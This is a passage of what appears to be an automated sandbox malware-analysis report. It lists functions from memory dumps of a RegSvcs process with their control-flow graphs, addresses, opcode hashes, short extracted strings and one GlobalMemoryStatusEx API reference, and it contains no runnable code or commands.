                                                                                                          • Instruction Fuzzy Hash: 0D22CF35E002098FDF65EFA4C4856AEBBF2EF85320F248469D449AF354DA31DD46CBA1
                                                                                                          Function 06A9B2A2 Relevance: .6, Instructions: 564COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0ebbe6e649c7ae7323a5e096e900f1f0a55682e0c2d8f658b924c308e64edb0a
                                                                                                          • Instruction ID: 52d0600f81921551c814a7845b3687ef6502a0aac883e19653ff308ce769d811
                                                                                                          • Opcode Fuzzy Hash: 0ebbe6e649c7ae7323a5e096e900f1f0a55682e0c2d8f658b924c308e64edb0a
                                                                                                          • Instruction Fuzzy Hash: 6C225174E101098FDF64EB69E5947AEB7E2EB85310F24882AE409EF351DA35DC81CB71
                                                                                                          Function 06A9AD48 Relevance: 10.4, Strings: 8, Instructions: 405COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 6a9ad48-6a9ad66 2 6a9ad68-6a9ad6b 0->2 3 6a9ad6d-6a9ad7a 2->3 4 6a9ad7f-6a9ad82 2->4 3->4 5 6a9ad88-6a9ad8b 4->5 6 6a9af65-6a9af6e 4->6 10 6a9ad8d-6a9ad92 5->10 11 6a9ad95-6a9ad98 5->11 7 6a9ad9a-6a9ada3 6->7 8 6a9af74-6a9af7e 6->8 13 6a9ada9-6a9adad 7->13 14 6a9af7f-6a9af89 7->14 10->11 11->7 12 6a9adb2-6a9adb5 11->12 15 6a9adcf-6a9add2 12->15 16 6a9adb7-6a9adca 12->16 13->12 23 6a9af8b-6a9af8d 14->23 24 6a9af2c-6a9af47 14->24 17 6a9ade2-6a9ade5 15->17 18 6a9add4-6a9addd 15->18 16->15 21 6a9ae08-6a9ae0b 17->21 22 6a9ade7-6a9ae03 17->22 18->17 27 6a9ae0d-6a9ae11 21->27 28 6a9ae1c-6a9ae1e 21->28 22->21 25 6a9af8f-6a9af91 23->25 26 6a9af30-6a9af33 23->26 51 6a9af4f-6a9af5b 24->51 33 6a9af93-6a9afb6 25->33 34 6a9af34-6a9af47 25->34 26->34 27->8 35 6a9ae17 27->35 29 6a9ae20 28->29 30 6a9ae25-6a9ae28 28->30 29->30 30->2 36 6a9ae2e-6a9ae52 30->36 37 6a9afb8-6a9afbb 33->37 34->51 35->28 57 6a9ae58-6a9ae67 36->57 58 6a9af62 36->58 40 6a9afc8-6a9afcb 37->40 41 6a9afbd-6a9afc7 37->41 44 6a9afda-6a9afdd 40->44 45 6a9afcd call 6a9b2a2 40->45 47 6a9afea-6a9afed 44->47 48 6a9afdf-6a9afe3 44->48 50 6a9afd3-6a9afd5 45->50 54 6a9afef-6a9b00b 47->54 55 6a9b010-6a9b013 47->55 52 6a9b019-6a9b054 48->52 53 6a9afe5 48->53 50->44 51->58 67 6a9b05a-6a9b066 52->67 68 6a9b247-6a9b25a 52->68 53->47 54->55 55->52 59 6a9b27c-6a9b27e 55->59 71 6a9ae69-6a9ae6f 57->71 72 6a9ae7f-6a9aeba call 6a96620 57->72 58->6 61 6a9b280 59->61 62 6a9b285-6a9b288 59->62 61->62 62->37 65 6a9b28e-6a9b298 62->65 77 6a9b068-6a9b081 67->77 78 6a9b086-6a9b0ca 67->78 69 6a9b25c 68->69 76 6a9b25d 69->76 74 6a9ae71 71->74 75 6a9ae73-6a9ae75 71->75 89 6a9aebc-6a9aec2 72->89 90 6a9aed2-6a9aee9 72->90 74->72 75->72 76->76 77->69 95 6a9b0cc-6a9b0de 78->95 96 6a9b0e6-6a9b125 78->96 91 6a9aec4 89->91 92 6a9aec6-6a9aec8 89->92 102 6a9aeeb-6a9aef1 90->102 103 6a9af01-6a9af12 90->103 91->90 92->90 95->96 100 6a9b12b-6a9b206 call 6a96620 96->100 101 6a9b20c-6a9b221 96->101 100->101 101->68 106 6a9aef3 102->106 107 6a9aef5-6a9aef7 102->107 110 6a9af2a 103->110 111 6a9af14-6a9af1a 103->111 106->103 107->103 110->24 113 6a9af1c 111->113 114 6a9af1e-6a9af20 111->114 113->110 114->110
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-3823777903
                                                                                                          • Opcode ID: f148a8f70563017365884663d657bc31471ea07cf97862f60cc6f7be7a20a961
                                                                                                          • Instruction ID: 2207bd056d5f9189b9aff775f0474ae429edbd6f47dff1a3b9e506d7a8791692
                                                                                                          • Opcode Fuzzy Hash: f148a8f70563017365884663d657bc31471ea07cf97862f60cc6f7be7a20a961
                                                                                                          • Instruction Fuzzy Hash: 76E15D71E0021A8FDF59EF68D4906AEB7F2FF85304F20852AD5059B354EB31D846CBA1
                                                                                                          Function 06A9B6C8 Relevance: 8.0, Strings: 6, Instructions: 470COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 262 6a9b6c8-6a9b6e8 263 6a9b6ea-6a9b6ed 262->263 264 6a9b6ef-6a9b6f6 263->264 265 6a9b701-6a9b704 263->265 266 6a9b6fc 264->266 267 6a9b9a2-6a9b9ab 264->267 268 6a9b759-6a9b75c 265->268 269 6a9b706-6a9b754 call 6a96620 265->269 266->265 270 6a9b9b0-6a9b9b3 267->270 271 6a9b75e-6a9b765 268->271 272 6a9b776-6a9b779 268->272 269->268 273 6a9b9ba-6a9b9bd 270->273 274 6a9b9b5-6a9b9b8 270->274 275 6a9ba59-6a9ba8e 271->275 276 6a9b76b-6a9b771 271->276 278 6a9b77b-6a9b782 272->278 279 6a9b793-6a9b796 272->279 280 6a9b9c2-6a9b9c5 273->280 274->273 274->280 293 6a9ba90-6a9ba93 275->293 276->272 278->275 282 6a9b788-6a9b78e 278->282 279->273 283 6a9b79c-6a9b79f 279->283 284 6a9b9cf-6a9b9d2 280->284 285 6a9b9c7-6a9b9cc 280->285 282->279 288 6a9b7de-6a9b7e1 283->288 289 6a9b7a1-6a9b7b6 283->289 291 6a9b9eb-6a9b9ee 284->291 292 6a9b9d4-6a9b9dd 284->292 285->284 288->273 290 6a9b7e7-6a9b7ea 288->290 289->275 310 6a9b7bc-6a9b7d9 289->310 294 6a9b7ec-6a9b7f3 290->294 295 6a9b810-6a9b813 290->295 297 6a9b9fb-6a9b9fe 291->297 298 6a9b9f0-6a9b9f6 291->298 292->275 296 6a9b9df-6a9b9e6 292->296 300 6a9ba99-6a9bac1 293->300 301 6a9bcff-6a9bd02 293->301 294->275 303 6a9b7f9-6a9b809 294->303 304 6a9b839-6a9b83c 295->304 305 6a9b815-6a9b81c 295->305 296->291 306 6a9ba11-6a9ba14 297->306 307 6a9ba00-6a9ba03 297->307 298->297 359 6a9bacb-6a9bb0f 300->359 360 6a9bac3-6a9bac6 300->360 308 6a9bd25-6a9bd27 301->308 309 6a9bd04-6a9bd20 301->309 303->305 336 6a9b80b 303->336 318 6a9b83e-6a9b845 304->318 319 6a9b866-6a9b869 304->319 305->275 313 6a9b822-6a9b832 305->313 316 6a9ba28-6a9ba2b 306->316 317 6a9ba16-6a9ba19 306->317 307->275 314 6a9ba05-6a9ba0c 307->314 311 6a9bd29 308->311 312 6a9bd2e-6a9bd31 308->312 309->308 310->288 311->312 312->293 323 6a9bd37-6a9bd40 312->323 313->318 347 6a9b834 313->347 314->306 316->307 322 6a9ba2d 316->322 329 6a9ba1b-6a9ba1e 317->329 330 6a9ba23-6a9ba26 317->330 318->275 321 6a9b84b-6a9b85b 318->321 324 6a9b86b-6a9b86e 319->324 325 6a9b8c7-6a9b8d0 319->325 321->273 349 6a9b861 321->349 331 6a9ba32-6a9ba35 322->331 332 6a9b888-6a9b88b 324->332 333 6a9b870-6a9b877 324->333 325->292 335 6a9b8d6 325->335 329->330 330->316 330->331 341 6a9ba3c-6a9ba3e 331->341 342 6a9ba37-6a9ba39 331->342 344 6a9b89d-6a9b8a0 332->344 345 6a9b88d 332->345 333->275 343 6a9b87d-6a9b883 333->343 346 6a9b8db-6a9b8de 335->346 336->295 350 6a9ba40 341->350 351 6a9ba45-6a9ba48 341->351 342->341 343->332 352 6a9b8c2-6a9b8c5 344->352 353 6a9b8a2-6a9b8bd 344->353 358 6a9b895-6a9b898 345->358 355 6a9b91d-6a9b920 346->355 356 6a9b8e0-6a9b8f5 346->356 347->304 349->319 350->351 351->263 357 6a9ba4e-6a9ba58 351->357 352->325 352->346 353->352 361 6a9b943-6a9b946 355->361 362 6a9b922-6a9b93e 355->362 356->275 371 6a9b8fb-6a9b918 356->371 358->344 385 6a9bb15-6a9bb1e 359->385 386 6a9bcf4-6a9bcfe 359->386 360->323 364 6a9b948-6a9b949 361->364 365 6a9b94e-6a9b951 361->365 362->361 364->365 368 6a9b953-6a9b95f 365->368 369 6a9b964-6a9b967 365->369 368->369 373 6a9b969-6a9b972 369->373 374 6a9b977-6a9b97a 369->374 371->355 373->374 378 6a9b98a-6a9b98d 374->378 379 6a9b97c-6a9b985 374->379 382 6a9b99d-6a9b9a0 378->382 383 6a9b98f-6a9b998 378->383 379->378 382->267 382->270 383->382 387 6a9bcea-6a9bcef 385->387 388 6a9bb24-6a9bb90 call 6a96620 385->388 387->386 396 6a9bc8a-6a9bc9f 388->396 397 6a9bb96-6a9bb9b 388->397 396->387 398 6a9bb9d-6a9bba3 397->398 399 6a9bbb7 397->399 401 6a9bba9-6a9bbab 398->401 402 6a9bba5-6a9bba7 398->402 403 6a9bbb9-6a9bbbf 399->403 404 6a9bbb5 401->404 402->404 405 6a9bbc1-6a9bbc7 403->405 406 6a9bbd4-6a9bbe1 403->406 404->403 407 6a9bbcd 405->407 408 6a9bc75-6a9bc84 405->408 413 6a9bbf9-6a9bc06 406->413 414 6a9bbe3-6a9bbe9 406->414 407->406 409 6a9bc08-6a9bc15 407->409 410 6a9bc3c-6a9bc49 407->410 408->396 408->397 422 6a9bc2d-6a9bc3a 409->422 423 6a9bc17-6a9bc1d 409->423 419 6a9bc4b-6a9bc51 410->419 420 6a9bc61-6a9bc6e 410->420 413->408 416 6a9bbeb 414->416 417 6a9bbed-6a9bbef 414->417 416->413 417->413 426 6a9bc53 419->426 427 6a9bc55-6a9bc57 419->427 420->408 422->408 424 6a9bc1f 423->424 425 6a9bc21-6a9bc23 423->425 424->422 425->422 426->420 427->420
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2392861976
                                                                                                          • Opcode ID: 3b46e1a0b22ff18694df49d65e8de2912aed540798b8209dcabcd7c8a5faadeb
                                                                                                          • Instruction ID: ed72bde99ea8c797fbbfcd54ffb24e7b4c484be00a765b439f9268bdc49bcbf0
                                                                                                          • Opcode Fuzzy Hash: 3b46e1a0b22ff18694df49d65e8de2912aed540798b8209dcabcd7c8a5faadeb
                                                                                                          • Instruction Fuzzy Hash: 25025D30E102098FDFA4EFA9E5946AEB7F1FB45310F24892AD409DF255DB31E845CBA1
                                                                                                          Function 06A991D0 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 430 6a991d0-6a991f5 431 6a991f7-6a991fa 430->431 432 6a99ab8-6a99abb 431->432 433 6a99200-6a99215 431->433 434 6a99abd-6a99adc 432->434 435 6a99ae1-6a99ae3 432->435 440 6a9922d-6a99243 433->440 441 6a99217-6a9921d 433->441 434->435 436 6a99aea-6a99aed 435->436 437 6a99ae5 435->437 436->431 439 6a99af3-6a99afd 436->439 437->436 447 6a9924e-6a99250 440->447 443 6a9921f 441->443 444 6a99221-6a99223 441->444 443->440 444->440 448 6a99268-6a992d9 447->448 449 6a99252-6a99258 447->449 460 6a992db-6a992fe 448->460 461 6a99305-6a99321 448->461 450 6a9925a 449->450 451 6a9925c-6a9925e 449->451 450->448 451->448 460->461 466 6a9934d-6a99368 461->466 467 6a99323-6a99346 461->467 472 6a9936a-6a9938c 466->472 473 6a99393-6a993ae 466->473 467->466 472->473 478 6a993b0-6a993cc 473->478 479 6a993d3-6a993e1 473->479 478->479 480 6a993f1-6a9946b 479->480 481 6a993e3-6a993ec 479->481 487 6a994b8-6a994cd 480->487 488 6a9946d-6a9948b 480->488 481->439 487->432 492 6a9948d-6a9949c 488->492 493 6a994a7-6a994b6 488->493 492->493 493->487 493->488
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2125118731
                                                                                                          • Opcode ID: f4158882a2f811ca5e43f76840170a1ddee85f887fdeb4934516cc0cd4c5550f
                                                                                                          • Instruction ID: 2207858f3f924cca93c66464dc10d70f6352683ca975501fd2636396cfd7531c
                                                                                                          • Opcode Fuzzy Hash: f4158882a2f811ca5e43f76840170a1ddee85f887fdeb4934516cc0cd4c5550f
                                                                                                          • Instruction Fuzzy Hash: 1A914F70F0021A9FDF54EF65D8A07AFB3F6ABC9244F148569C40DEB354EA709C468BA1
                                                                                                          Function 06A9CFB8 Relevance: 4.6, Strings: 3, Instructions: 800COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 496 6a9cfb8-6a9cfd3 497 6a9cfd5-6a9cfd8 496->497 498 6a9cfda-6a9d01c 497->498 499 6a9d021-6a9d024 497->499 498->499 500 6a9d06d-6a9d070 499->500 501 6a9d026-6a9d035 499->501 503 6a9d0b9-6a9d0bc 500->503 504 6a9d072-6a9d0b4 500->504 505 6a9d044-6a9d050 501->505 506 6a9d037-6a9d03c 501->506 507 6a9d0be-6a9d100 503->507 508 6a9d105-6a9d108 503->508 504->503 509 6a9d9d5-6a9da0e 505->509 510 6a9d056-6a9d068 505->510 506->505 507->508 513 6a9d10a-6a9d119 508->513 514 6a9d151-6a9d154 508->514 523 6a9da10-6a9da13 509->523 510->500 520 6a9d128-6a9d134 513->520 521 6a9d11b-6a9d120 513->521 518 6a9d163-6a9d166 514->518 519 6a9d156-6a9d158 514->519 527 6a9d168-6a9d1aa 518->527 528 6a9d1af-6a9d1b2 518->528 524 6a9d15e 519->524 525 6a9d4a1 519->525 520->509 522 6a9d13a-6a9d14c 520->522 521->520 522->514 534 6a9da15-6a9da31 523->534 535 6a9da36-6a9da39 523->535 524->518 530 6a9d4a4-6a9d4b0 525->530 527->528 531 6a9d1fb-6a9d1fe 528->531 532 6a9d1b4-6a9d1f6 528->532 530->501 539 6a9d4b6-6a9d7a3 530->539 536 6a9d221-6a9d224 531->536 537 6a9d200-6a9d21c 531->537 532->531 534->535 543 6a9da3b-6a9da67 535->543 544 6a9da6c-6a9da6f 535->544 545 6a9d241-6a9d244 536->545 546 6a9d226-6a9d23c 536->546 537->536 708 6a9d7a9-6a9d7af 539->708 709 6a9d9ca-6a9d9d4 539->709 543->544 550 6a9da7e-6a9da80 544->550 551 6a9da71 call 6a9db2d 544->551 557 6a9d28d-6a9d290 545->557 558 6a9d246-6a9d288 545->558 546->545 553 6a9da82 550->553 554 6a9da87-6a9da8a 550->554 566 6a9da77-6a9da79 551->566 553->554 554->523 567 6a9da8c-6a9da9b 554->567 562 6a9d29f-6a9d2a2 557->562 563 6a9d292-6a9d294 557->563 558->557 571 6a9d2ac-6a9d2af 562->571 572 6a9d2a4-6a9d2a9 562->572 569 6a9d29a 563->569 570 6a9d35f-6a9d368 563->570 566->550 591 6a9da9d-6a9db00 call 6a96620 567->591 592 6a9db02-6a9db17 567->592 569->562 578 6a9d36a-6a9d36f 570->578 579 6a9d377-6a9d383 570->579 571->530 582 6a9d2b5-6a9d2b8 571->582 572->571 578->579 587 6a9d389-6a9d39d 579->587 588 6a9d494-6a9d499 579->588 589 6a9d2ba-6a9d2fc 582->589 590 6a9d301-6a9d304 582->590 587->525 608 6a9d3a3-6a9d3b5 587->608 588->525 589->590 596 6a9d34d-6a9d34f 590->596 597 6a9d306-6a9d348 590->597 591->592 601 6a9d351 596->601 602 6a9d356-6a9d359 596->602 597->596 601->602 602->497 602->570 618 6a9d3d9-6a9d3db 608->618 619 6a9d3b7-6a9d3bd 608->619 624 6a9d3e5-6a9d3f1 618->624 625 6a9d3bf 619->625 626 6a9d3c1-6a9d3cd 619->626 638 6a9d3ff 624->638 639 6a9d3f3-6a9d3fd 624->639 628 6a9d3cf-6a9d3d7 625->628 626->628 628->624 641 6a9d404-6a9d406 638->641 639->641 641->525 644 6a9d40c-6a9d428 call 6a96620 641->644 652 6a9d42a-6a9d42f 644->652 653 6a9d437-6a9d443 644->653 652->653 653->588 654 6a9d445-6a9d492 653->654 654->525 710 6a9d7be-6a9d7c7 708->710 711 6a9d7b1-6a9d7b6 708->711 710->509 712 6a9d7cd-6a9d7e0 710->712 711->710 714 6a9d9ba-6a9d9c4 712->714 715 6a9d7e6-6a9d7ec 712->715 714->708 714->709 716 6a9d7fb-6a9d804 715->716 717 6a9d7ee-6a9d7f3 715->717 716->509 718 6a9d80a-6a9d82b 716->718 717->716 721 6a9d83a-6a9d843 718->721 722 6a9d82d-6a9d832 718->722 721->509 723 6a9d849-6a9d866 721->723 722->721 723->714 726 6a9d86c-6a9d872 723->726 726->509 727 6a9d878-6a9d891 726->727 729 6a9d9ad-6a9d9b4 727->729 730 6a9d897-6a9d8be 727->730 729->714 729->726 730->509 733 6a9d8c4-6a9d8ce 730->733 733->509 734 6a9d8d4-6a9d8eb 733->734 736 6a9d8fa-6a9d915 734->736 737 6a9d8ed-6a9d8f8 734->737 736->729 742 6a9d91b-6a9d934 call 6a96620 736->742 737->736 746 6a9d943-6a9d94c 742->746 747 6a9d936-6a9d93b 742->747 746->509 748 6a9d952-6a9d9a6 746->748 747->746 748->729
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q
                                                                                                          • API String ID: 0-831282457
                                                                                                          • Opcode ID: 0ee31d27d5dbd2ce9cfd2c7553c5c27e31235b30c83a62bbeb65df0368da4139
                                                                                                          • Instruction ID: f2dc0a7aabdf51b1e46bd1c7c72ab6de2e0b5c86490ba0e63a094a44d0a47e6b
                                                                                                          • Opcode Fuzzy Hash: 0ee31d27d5dbd2ce9cfd2c7553c5c27e31235b30c83a62bbeb65df0368da4139
                                                                                                          • Instruction Fuzzy Hash: 5A623E34A0060A8FCB55EF69D590A5EB7F2FF84304F208969D0099F369DB71ED86CB91
                                                                                                          Function 06A94BE0 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 756 6a94be0-6a94c04 757 6a94c06-6a94c09 756->757 758 6a94c0b-6a94c25 757->758 759 6a94c2a-6a94c2d 757->759 758->759 760 6a9530c-6a9530e 759->760 761 6a94c33-6a94d2b 759->761 762 6a95310 760->762 763 6a95315-6a95318 760->763 779 6a94dae-6a94db5 761->779 780 6a94d31-6a94d7e call 6a95488 761->780 762->763 763->757 765 6a9531e-6a9532b 763->765 781 6a94e39-6a94e42 779->781 782 6a94dbb-6a94e2b 779->782 793 6a94d84-6a94da0 780->793 781->765 799 6a94e2d 782->799 800 6a94e36 782->800 796 6a94dab 793->796 797 6a94da2 793->797 796->779 797->796 799->800 800->781
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: fcq$XPcq$\Ocq
                                                                                                          • API String ID: 0-3575482020
                                                                                                          • Opcode ID: 0e2ddc4a73412e8ea7eb36cf7040e399adde255d719d8159663a445f2395d1c2
                                                                                                          • Instruction ID: 61444539161a3ee34a1576ea303e77997c9f47d61d0b59a01a2bc71194ca5e40
                                                                                                          • Opcode Fuzzy Hash: 0e2ddc4a73412e8ea7eb36cf7040e399adde255d719d8159663a445f2395d1c2
                                                                                                          • Instruction Fuzzy Hash: 3B617170F002099FEF55AFB5D8547AEBBF6FB88700F20842AD105AB395DB758C068B91
                                                                                                          Function 06A991BF Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1873 6a991bf-6a991f5 1875 6a991f7-6a991fa 1873->1875 1876 6a99ab8-6a99abb 1875->1876 1877 6a99200-6a99215 1875->1877 1878 6a99abd-6a99adc 1876->1878 1879 6a99ae1-6a99ae3 1876->1879 1884 6a9922d-6a99243 1877->1884 1885 6a99217-6a9921d 1877->1885 1878->1879 1880 6a99aea-6a99aed 1879->1880 1881 6a99ae5 1879->1881 1880->1875 1883 6a99af3-6a99afd 1880->1883 1881->1880 1891 6a9924e-6a99250 1884->1891 1887 6a9921f 1885->1887 1888 6a99221-6a99223 1885->1888 1887->1884 1888->1884 1892 6a99268-6a992d9 1891->1892 1893 6a99252-6a99258 1891->1893 1904 6a992db-6a992fe 1892->1904 1905 6a99305-6a99321 1892->1905 1894 6a9925a 1893->1894 1895 6a9925c-6a9925e 1893->1895 1894->1892 1895->1892 1904->1905 1910 6a9934d-6a99368 1905->1910 1911 6a99323-6a99346 1905->1911 1916 6a9936a-6a9938c 1910->1916 1917 6a99393-6a993ae 1910->1917 1911->1910 1916->1917 1922 6a993b0-6a993cc 1917->1922 1923 6a993d3-6a993e1 1917->1923 1922->1923 1924 6a993f1-6a9946b 1923->1924 1925 6a993e3-6a993ec 1923->1925 1931 6a994b8-6a994cd 1924->1931 1932 6a9946d-6a9948b 1924->1932 1925->1883 1931->1876 1936 6a9948d-6a9949c 1932->1936 1937 6a994a7-6a994b6 1932->1937 1936->1937 1937->1931 1937->1932
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q
                                                                                                          • API String ID: 0-355816377
                                                                                                          • Opcode ID: 48fbbe24c02761e4402fbab7d8e4d988ac74c9ec2facfef87fa062df11a07147
                                                                                                          • Instruction ID: 121cf90a68ef3faa01908b6f29f1b1af03c473c563fdc1f746a54cc21c489826
                                                                                                          • Opcode Fuzzy Hash: 48fbbe24c02761e4402fbab7d8e4d988ac74c9ec2facfef87fa062df11a07147
                                                                                                          • Instruction Fuzzy Hash: C4514270B00109AFDF54EB75E9A0BAFB3F6AB89644F148569C509DB354EA30DC428BA1
                                                                                                          Function 06A94BD0 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1940 6a94bd0-6a94c04 1941 6a94c06-6a94c09 1940->1941 1942 6a94c0b-6a94c25 1941->1942 1943 6a94c2a-6a94c2d 1941->1943 1942->1943 1944 6a9530c-6a9530e 1943->1944 1945 6a94c33-6a94d2b 1943->1945 1946 6a95310 1944->1946 1947 6a95315-6a95318 1944->1947 1963 6a94dae-6a94db5 1945->1963 1964 6a94d31-6a94d7e call 6a95488 1945->1964 1946->1947 1947->1941 1949 6a9531e-6a9532b 1947->1949 1965 6a94e39-6a94e42 1963->1965 1966 6a94dbb-6a94e2b 1963->1966 1977 6a94d84-6a94da0 1964->1977 1965->1949 1983 6a94e2d 1966->1983 1984 6a94e36 1966->1984 1980 6a94dab 1977->1980 1981 6a94da2 1977->1981 1980->1963 1981->1980 1983->1984 1984->1965
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: fcq$XPcq
                                                                                                          • API String ID: 0-936005338
                                                                                                          • Opcode ID: ca39230bb0cd90faf87b52c19c4f43323df62f383e6610b2a43a662538def9bb
                                                                                                          • Instruction ID: a03a91114d896d9ede911e97ca41aff39c57f945c04c1f448a47095652aac6f4
                                                                                                          • Opcode Fuzzy Hash: ca39230bb0cd90faf87b52c19c4f43323df62f383e6610b2a43a662538def9bb
                                                                                                          • Instruction Fuzzy Hash: 9F516F70F102099FEF55AFB5C4547AEBAF6FF88700F20852AD106AB395DA718C028B91
                                                                                                          Function 0153EC39 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2164 153ec39-153ec53 2165 153ec55-153ec7c 2164->2165 2166 153ec7d-153ec9c call 153e3b0 2164->2166 2171 153eca2-153ed01 2166->2171 2172 153ec9e-153eca1 2166->2172 2179 153ed03-153ed06 2171->2179 2180 153ed07-153ed94 GlobalMemoryStatusEx 2171->2180 2183 153ed96-153ed9c 2180->2183 2184 153ed9d-153edc5 2180->2184 2183->2184
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1803815712.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1530000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 49cd9d4cce26b99d4d704ec919fcdc4af9654a35bd2a973034ea9421872c1b4c
                                                                                                          • Instruction ID: eee709fceddf11c942d66d648e209a5387f82b28229b02ebff1ab88ef3ea31e0
                                                                                                          • Opcode Fuzzy Hash: 49cd9d4cce26b99d4d704ec919fcdc4af9654a35bd2a973034ea9421872c1b4c
                                                                                                          • Instruction Fuzzy Hash: 60412372D0039A8FCB00EF7AD8042DEBFF1AFC9310F14856AD544A7291DB349845CBA1
                                                                                                          Function 0153ED20 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 0153ED87
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1803815712.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1530000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                          • String ID:
                                                                                                          • API String ID: 1890195054-0
                                                                                                          • Opcode ID: bdeb5bace36edf5b0c60ce43a7888b200314a912ade1b3b6592efa18b71a9507
                                                                                                          • Instruction ID: eabb782c88cf2a7431d531caf51de2e4121c9413308c7fa608f9adfbc2ffdbec
                                                                                                          • Opcode Fuzzy Hash: bdeb5bace36edf5b0c60ce43a7888b200314a912ade1b3b6592efa18b71a9507
                                                                                                          • Instruction Fuzzy Hash: 04111FB1C002699BCB10DFAAC444BDEFBF4FB48320F10852AE818A7250D378A944CFA5
                                                                                                          Function 06A9DB2D Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
